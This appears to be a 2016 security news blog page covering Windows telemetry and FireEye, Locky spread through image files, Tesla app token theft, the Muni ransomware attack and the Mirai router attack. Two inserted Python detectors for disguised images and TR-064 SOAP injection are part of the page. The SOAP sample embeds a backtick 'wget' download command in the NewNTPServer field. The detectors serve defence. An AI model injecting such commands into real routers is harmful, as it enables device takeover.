
Wednesday 30 November 2016

Microsoft Shares Telemetry Data Collected from Windows 10 Users with 3rd-Party




Cyber security is a major challenge in today's world: cyber attacks have become more automated and difficult to detect, and traditional cyber security practices and systems are no longer sufficient to protect businesses, governments, and other organizations.

In the past few years, artificial intelligence and machine learning have made a name for themselves in the field of cyber security, helping IT and security professionals identify risks more quickly and efficiently and anticipate problems before they occur.

The good news is that if you are a Windows 10 user, Microsoft will now offer you a machine learning based threat intelligence feature via its inbuilt Windows security service, which will improve the security capabilities available on Windows 10 devices.

But, the bad news is that it is not free.

The company is offering this "differentiated intelligence" feature through a service recently added to Windows 10, dubbed Windows Defender Advanced Threat Protection (WDATP), which helps enterprises detect, investigate, and respond to advanced attacks on their networks.

This is made possible by a deal Microsoft recently signed with FireEye that integrates the security vendor's iSIGHT Threat Intelligence into Windows Defender Advanced Threat Protection.

As part of the partnership, Microsoft will give FireEye access to all the telemetry data from every device running Windows 10, Australian website ARN reports.
"FireEye has invested in nation-state grade threat intelligence, and we are strategically partnering with industry leaders to operationalize this high-quality intel," Ken Gonzalez, FireEye's Vice President of Corporate Development, said in the official press release.
"By working with Microsoft, we’re able to offer differentiated threat intelligence within WDATP and together help make organizations more secure."
Update: Microsoft denies the claims, saying that the deal does not include any sharing of Microsoft telemetry with FireEye. Here's the official statement provided by a Microsoft Spokesperson to The Hacker News:
"The nature of the deal between Microsoft and FireEye is to license threat intelligence content from FireEye iSIGHT Intelligence. This additional layer of intelligence includes indicators and reports of past attacks collected and edited by FireEye and enhances detection capabilities of Windows Defender Advanced Threat Protection (WDATP). The deal does not include the sharing of Microsoft telemetry."
It's no secret that Windows 10 collects all sorts of usage information on users and sends it back to Microsoft, which then uses this telemetry data to help identify security issues, fix problems and improve the quality of its operating system.

This telemetry data includes information on the device running Windows 10, a list of installed apps, crash dumps, and other statistics from devices powered by its latest operating system.

However, Microsoft's data collection has also raised privacy concerns among Windows users.

This newly signed deal with FireEye is the first time that Microsoft has publicly agreed to share telemetry data of Windows 10 users with a third party, which is definitely worrying for many users.

At this moment, the official press release says nothing about Microsoft providing FireEye with access to data collected from Windows 10 users.

Microsoft has yet to comment on this matter.

Beware! Malicious JPG Images on Facebook Messenger Spreading Locky Ransomware



If you receive an image file sent by someone, even your friend, on your Facebook Messenger, LinkedIn or any other social media platform, just DO NOT CLICK ON IT.

Even a JPG image file could infect your computer with the infamous Locky ransomware.

Earlier this week, I reported a new attack campaign that used Facebook Messenger to spread Locky Ransomware via .SVG image files, although Facebook denied this was the case.

Now, researchers have discovered that the ongoing spam campaign is also using booby-trapped .JPG image files to download and infect users with the Locky ransomware via Facebook, LinkedIn, and other social networking platforms.

Security researchers from Israeli security firm Check Point have reportedly discovered how cyber criminals are hiding malware in image files, and how they are executing the malware code within these images to infect social media users with Locky variants.

According to the researchers, malware authors have discovered security vulnerabilities in Facebook and LinkedIn that force a maliciously coded image file to download onto a user's computer, though in some cases the user has to click on the image file to download it.

When the user notices the automatically downloaded file and opens it, malicious code installs the Locky ransomware onto the user's computer, which encrypts all files on the infected computer until a ransom is paid.

Flaws in Facebook and LinkedIn Remain Unpatched




The security firm has declined to provide technical details as the vulnerability the malware relies on still impacts both Facebook and LinkedIn, among other unnamed web services.


"The attackers have built a new capability to embed malicious code into an image file and successfully upload it to the social media website," Check Point researchers say.

"The attackers exploit a misconfiguration on the social media infrastructure to deliberately force their victims to download the image file. This results in infection of the users' device as soon as the end-user clicks on the downloaded file."

Check Point says it reported the issue to both Facebook and LinkedIn back in September, but the vulnerabilities remain unpatched on both platforms and are now being actively exploited by attackers.

Video Demonstration of the Attack


You can also watch Check Point's video demonstration of this attack, which the firm dubbed ImageGate, showing the attack in action.


Locky is Spreading Massively via Social Media Platforms


Locky ransomware has been around since early this year and has become the biggest and most common ransomware family known today. It works by encrypting victims' files with RSA-2048 and AES-1024 algorithms and demands a ransom for the key.

Locky ransomware mainly spreads via phishing emails containing a malicious attachment disguised as a Word or Zip file. But since people spend a lot of time on social networks, cyber crooks have turned their focus to finding a way into these platforms.

Check Point says that in the past week, they have noticed a "massive spread of the Locky ransomware via social media, particularly in its Facebook-based campaign."

To keep yourself safe, you are advised not to open any unsolicited file that has automatically downloaded onto your computer, especially image files with unusual extensions like SVG, JS, or HTA.
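To turn that advice into a check, here is an added example (not code from the article or from Check Point) that inspects files which arrived as "images": it flags the scriptable extensions named above, an image extension whose bytes do not match the format's magic signature, and markup that would execute when opened. The sample files are constructed byte strings and the heuristics are my own.

```python
import re

# Magic bytes a real raster image of each type must start with (common signatures only).
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Extensions the article warns about: these render or run code, they are not pictures.
SCRIPTABLE_EXTS = {".svg", ".js", ".hta"}
# Markup constructs that execute when an SVG or HTA is opened in a browser or by mshta.
ACTIVE_MARKUP = re.compile(rb"<script\b|\bon[a-z]+\s*=|javascript:|<foreignObject\b", re.I)


def extension(name):
    """Last extension, lower-cased: 'cute.jpg.hta' -> '.hta' (the part the OS acts on)."""
    base = name.lower().rsplit("/", 1)[-1]
    return base[base.rfind("."):] if "." in base else ""


def assess_image(name, data):
    """Findings for one downloaded 'image'. An empty list means it looks like a plain raster image."""
    findings = []
    ext = extension(name)
    if ext in SCRIPTABLE_EXTS:
        findings.append("scriptable-extension:" + ext)
    # A .jpg/.png/.gif whose bytes are not that format is a disguised file.
    if ext in MAGIC and not any(data.startswith(sig) for sig in MAGIC[ext]):
        findings.append("magic-mismatch:" + ext)
    # Text that starts with '<' is markup; look for anything a viewer would execute.
    if data.lstrip().startswith(b"<") and ACTIVE_MARKUP.search(data):
        findings.append("active-content")
    return findings


# Constructed sample downloads (not files from the real campaign).
SAMPLES = {
    "beach.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16,
    "funny.svg": b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"></svg>',
    "photo.jpg": b"MZ\x90\x00" + b"\x00" * 16,  # executable header behind a .jpg name
    "cute.jpg.hta": b"<html><script>void 0;</script></html>",
}


def scan_samples(samples=SAMPLES):
    """Map each file name to its findings; anything non-empty should not be opened."""
    return {name: assess_image(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print(name, "->", findings or "looks like a plain image")
```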

The bottom line: don't be curious about an image sent by someone, at least for the time being.

Researchers Show How to Steal Tesla Car by Hacking into Owner's Smartphone




New technology is always a little scary, and smart cars are no exception. From GPS and satellite radio to wireless locks, steering, brakes, and accelerator, today's vehicles are more connected to networks than ever, and so they are more hackable than ever.

It's nothing new for security researchers to hack connected cars. Previously they have demonstrated how to hijack a car remotely, and how to disable a car's crucial functions, such as airbags, by exploiting security bugs in several automobiles.

This time, researchers at Norway-based security firm Promon have demonstrated how easy it is for hackers to steal Tesla cars through the company's official Android application, which many car owners use to interact with their vehicle.

Two months ago, Chinese security researchers from Keen Lab managed to hack a Tesla Model S, which allowed them to control a car in both Parking and Driving Mode from 12 miles away.

However, Promon researchers have taken an entirely different approach.

Tesla Stores OAuth Token in Plaintext


The researchers infected a Tesla owner's phone with Android malware that compromised Tesla's smartphone app, allowing them to locate, unlock and drive away with a Tesla Model S.

However, Tesla has clarified that the vulnerabilities used in the latest attack do not reside in its app; rather, the attack relied on known social engineering techniques that trick people into installing malware on their Android devices, which compromises the entire phone and every app on it, including the Tesla app.

In a blog post, Promon researchers explained that the Tesla app generates an OAuth token when a Tesla owner logs in to the Android app for the first time. The app then uses this token instead of asking for the username and password every time the owner re-opens the app.

This OAuth token is then stored in plain text in the device's system folder, which can be accessed only by the privileged root user.


Researchers Demonstrate How to Steal a Tesla Car


According to the researchers, it is easy for an attacker to develop a malicious app that contains Android rooting exploits such as Towelroot and Kingroot, which can then be used to escalate the malicious app's privileges, allowing the attacker to read the OAuth token from the Tesla app.

Stealing this token would let an attacker locate the car and open its doors, but would not let the attacker start the car and drive away with it.

For this, the malware needs to delete the OAuth token from the owner's phone, which prompts the owner to enter his/her username and password again, allowing the attacker to collect the owner's login credentials.

Researchers say this can be done by modifying the original Tesla app's source code. Since the malware has already rooted the owner's smartphone, it can alter the Tesla app and send a copy of the victim's username and password to the attacker.



With this data, the attacker can perform a series of actions, such as locating the car on the road, opening its doors, starting the motor and driving the car away unhindered, just by sending well-crafted HTTP requests to Tesla's servers with the owner's OAuth token and password.

Tesla says the issue is not with its product but with common social engineering tricks that attackers use to first compromise the victim's phone, root the device and then alter its apps' data.

The researchers' attack is only possible when an attacker convinces a victim to download a malicious app onto his/her Android device.

Hacker who exposed Steubenville Rape Faces longer Prison term than Rapists



Remember Steubenville High School Rape Case?

In 2012, Steubenville (Ohio) high school's football team players gang-raped an unconscious teenage girl from West Virginia and took photographs of the sexual assault.

In December 2012, a member of the hacker collective Anonymous hacked into the Steubenville High School football fan website Roll Red Roll and leaked some evidence of the rape, including a video taken and shared by the crime's perpetrators in which they joked about the sexual assault.

The hack exposed information about the gang rape by two football team players — Trent Mays and Ma’lik Richmond, both 16 at the time of the crime — who were eventually convicted and sentenced in 2013 to two and one years behind bars, respectively, but have since been released.

In 2013, the FBI raided the home of Deric Lostutter — Anonymous member, also known online as "KYAnonymous" — seized two laptops, flash drives, CDs, an external hard drive, cell phones and an Xbox, and arrested him.

Lostutter, a 29-year-old man from Winchester, pleaded guilty in federal court in Kentucky on Wednesday to one count of conspiring to access computers without authorization in order to draw attention to the Steubenville rape case, and one count of lying to an FBI agent.

What's weird? The hacker is facing a longer prison term than the rapists.

Lostutter said he hacked into the site with the sole intention of exposing information about the gang rape. He said in court Wednesday, "We wanted to stand up for a girl who had no voice, and we went about it the wrong way," according to WTVQ.

However, prosecutors alleged that Lostutter participated in an online campaign against the school in late 2012 under the banner of Anonymous. They also said Lostutter used the online alias KYAnonymous to conspire online with other hacktivists in December 2012.

According to prosecutors, the goal was to intimidate and harass an individual who ran Roll Red Roll, the website dedicated to the football team. Lostutter gained unauthorized access to the target's website and leaked its owner's personal emails online.

There's no doubt that the operation against the school website helped bring the Steubenville rape case into the national spotlight. But Lostutter was questioned over his participation after the campaign got off the ground.
"Lostutter filmed a video wearing a mask and wrote a manifesto, which was both posted on the website to harass and intimidate people, and to gain publicity for Lostutter and [Noah] McHugh's online identities," said the prosecutors.
"Specifically, the messages threatened to reveal personal identifying information of Steubenville High School students, and made false claims that the administrator of the fan website was involved in child pornography and directed a 'rape crew.'"
Lostutter faces a maximum sentence of 10 years in prison and $250,000 in fines. He is scheduled to appear before the judge for sentencing on March 8, 2017. His defense did not comment on the plea agreement.

Noah McHugh, Lostutter's co-conspirator, pleaded guilty in September to hacking the Steubenville website. He is slated to be sentenced in December.

San Francisco Metro System Hacked with Ransomware; Resulting in Free Rides



Nothing is immune to being hacked when hackers are motivated.

Hackers proved this again on Friday, when more than 2,000 computer systems at San Francisco's public transit agency were apparently hacked.

San Francisco's Municipal Transportation Agency, also known as MUNI, offered free rides on November 26th after MUNI station payment systems and schedule monitors got hacked by ransomware and station screens across the city started displaying a message that reads:

"You Hacked, ALL Data Encrypted. Contact For Key(cryptom27@yandex.com)ID:681 ,Enter."

According to the San Francisco Examiner, MUNI confirmed a Ransomware attack against the station fare systems, which caused them to shut down ticket kiosks and make rides free this weekend.

As you can see, the message displayed by the malware is followed by an email address and an ID number, which are used to arrange ransom payments.

MUNI spokesman Paul Rose said his agency was investigating the matter and "working to resolve the situation," but did not provide details as to how MUNI got hacked.

"We are currently working to resolve the situation," said Rose. "There is an ongoing investigation, and it wouldn’t be appropriate to provide additional details."



Trains themselves were not affected by the malware attack, and MUNI said that payments resumed on the morning of November 27th. MUNI operates trains, trams and buses around the city, including San Francisco's iconic cable cars.

It is not yet clear exactly who was responsible for the attack (beyond the pseudonym "Andy Saolis"), but according to local media reports, the agency's computers were being held hostage by the ransomware until MUNI paid the equivalent of more than $73,000 in Bitcoin.

Andy Saolis is a pseudonym commonly used in HDDCryptor ransomware attacks. HDDCryptor uses commercial tools to encrypt hard drives and network shares on Windows machines with randomly generated keys, and then overwrites the hard disks' MBRs so that the systems can no longer boot properly.

The target machine is typically infected by accidentally opening a malicious executable in an email or download, and then the malware spreads out across the network.

The email address the anonymous criminal used, cryptom27@yandex.com, points the city to a Russian email provider to arrange payment and has been linked to other cyber attacks as well.

The Hacker Linked to a Previous Ransomware Strain


When contacted at the provided email address, the hacker gave a statement in broken English, which read:
"We don't attention to interview and propagate news! Our software working completely automatically and we don't have targeted attack to anywhere! SFMTA network was Very Open and 2000 Server/PC infected by software! So we are waiting for contact any responsible person in SFMTA but I think they don't want deal ! so we close this email tomorrow!"
The same email address, cryptom27@yandex.com, was linked to a ransomware strain called Mamba in September. The ransomware employs tactics similar to those demonstrated against the MUNI systems.

The hacker provided Hoodline with a list of systems the hacker claimed to have infected in MUNI's network, which came to 2,112 of the total 8,656 systems. The hacker also said that MUNI had "one more day" to make a deal.

Not much about the hack is known; its extent and the hacker's identity remain a mystery for now, but the incident once again reminds us how vulnerable our critical infrastructure remains.

Cyber Attack Knocks Nearly a Million Routers Offline



The Mirai botnet is getting stronger and more notorious with each passing day. The reason: insecure Internet-of-Things devices.

Last month, the Mirai botnet knocked the entire Internet offline for a few hours, crippling some of the world's biggest and most popular websites.

Now, more than 900,000 broadband routers belonging to Deutsche Telekom users in Germany were knocked offline over the weekend following a suspected cyber attack, affecting telephony, television, and internet service in the country.

The German Internet service provider Deutsche Telekom, which offers various services to around 20 million customers, confirmed on Facebook that as many as 900,000 customers suffered internet outages on Sunday and Monday.

Millions of routers made by Zyxel and Speedport are said to be vulnerable to a critical remote code execution flaw: they leave port 7547 open to the Internet to receive commands based on the TR-069 and related TR-064 protocols, which are meant to be used by ISPs to manage customer devices remotely.

The same vulnerability affects Eir D1000 wireless routers (rebranded Zyxel modems) deployed by Irish internet service provider Eircom, though there are no signs that those routers are being actively exploited.

According to a Shodan search, around 41 million devices leave port 7547 open, while about 5 million expose TR-064 services to the outside world.

According to an advisory published by the SANS Internet Storm Center, honeypot servers posing as vulnerable routers are receiving exploit code every 5-10 minutes for each target IP.

An intercepted packet showed how a remote code execution flaw in the <NewNTPServer> part of a SOAP request was used to download and execute a file in order to infect the vulnerable device.
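As an added example (not code from the article, SANS ISC or BadCyber), here is a Python check a honeypot or proxy operator could run over SOAP bodies received on port 7547: it parses the request, pulls out every NewNTPServer argument, and flags any value that is not a plain hostname or IP address, which is how a command-injection attempt through that field stands out from a legitimate ISP configuration change. The TR-064 Time-service namespace, the SetNTPServers action name and both sample bodies are assumed and constructed for illustration.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

# Constructed sample request bodies (not captured traffic). Namespace and
# action name follow the TR-064 Time service as assumed here.
BENIGN = b"""<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
 <s:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
  <NewNTPServer1>pool.ntp.org</NewNTPServer1>
 </u:SetNTPServers></s:Body></s:Envelope>"""

SUSPICIOUS = b"""<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
 <s:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
  <NewNTPServer1>`cd /tmp;wget http://c2.invalid/x`</NewNTPServer1>
 </u:SetNTPServers></s:Body></s:Envelope>"""

# RFC-1123 style hostname: labels of letters, digits and hyphens joined by dots.
HOSTNAME = re.compile(r"^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*$", re.I)


def is_plain_ntp_target(value):
    """An NTP server argument should be nothing but a hostname or an IP address."""
    value = value.strip()
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return bool(HOSTNAME.match(value))


def inspect_tr064_body(body):
    """Classify one HTTP request body seen on the TR-064 port.
    Returns the SOAP action, the NTP arguments, the offending values and a verdict."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return {"action": None, "ntp": [], "bad": [], "verdict": "malformed-xml"}
    action = None
    ntp_values = []
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1]  # strip the XML namespace
        if local == "SetNTPServers":
            action = local
        if local.startswith("NewNTPServer"):  # NewNTPServer, NewNTPServer1, ...
            ntp_values.append(el.text or "")
    bad = [v for v in ntp_values if not is_plain_ntp_target(v)]
    if bad:
        verdict = "command-injection-attempt"
    elif action:
        verdict = "config-change"
    else:
        verdict = "other"
    return {"action": action, "ntp": ntp_values, "bad": bad, "verdict": verdict}


if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, "->", inspect_tr064_body(body)["verdict"])
```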

Security researchers at BadCyber also analyzed one of the malicious payloads delivered during the attacks and discovered that the attack originated from a known Mirai command-and-control server.
"The unusual application of TR-064 commands to execute code on routers has been described for the very first time at the beginning of November, and a few days later a relevant Metasploit module had appeared," BadCyber wrote in a blog post. "It looks like someone decided to weaponize it and create an Internet worm based on Mirai code."
It all started in early October, when a cyber criminal publicly released the source code of Mirai, a nasty piece of IoT malware designed to scan for insecure IoT devices – mostly routers, cameras, and DVRs – and enslave them in a botnet, which is then used to launch DDoS attacks.

The hacker created three separate exploit files in order to infect three different architectures: two running different types of MIPS chips and one with ARM silicon.

The malicious payloads open the remote administration interface and then attempt to log in using three different default passwords. After this is done, the exploit then closes port 7547 in order to prevent other attackers from taking control of the infected devices.

"Logins and passwords are obfuscated (or "encrypted") in the worm code using the same algorithm as does Mirai," the researchers say. "The C&C server resides under timeserver.host domain name, which can be found on the Mirai tracker list."

More in-depth technical details about the vulnerability can be found at ISC SANS, Kaspersky Lab, and the Reverse Engineering Blog.





Deutsche Telekom has issued an emergency patch for two models of its Speedport broadband routers – Speedport W 921V and Speedport W 723V Type B – and is currently rolling out firmware updates.

The company recommends that its customers power down their routers, wait 30 seconds and then restart them, so that the new firmware is fetched during the boot process.

If the router fails to connect to the company's network, users are advised to disconnect their device from the network permanently.

To compensate for the downtime, the ISP is also offering free Internet access via mobile devices to affected customers until the technical problem is resolved.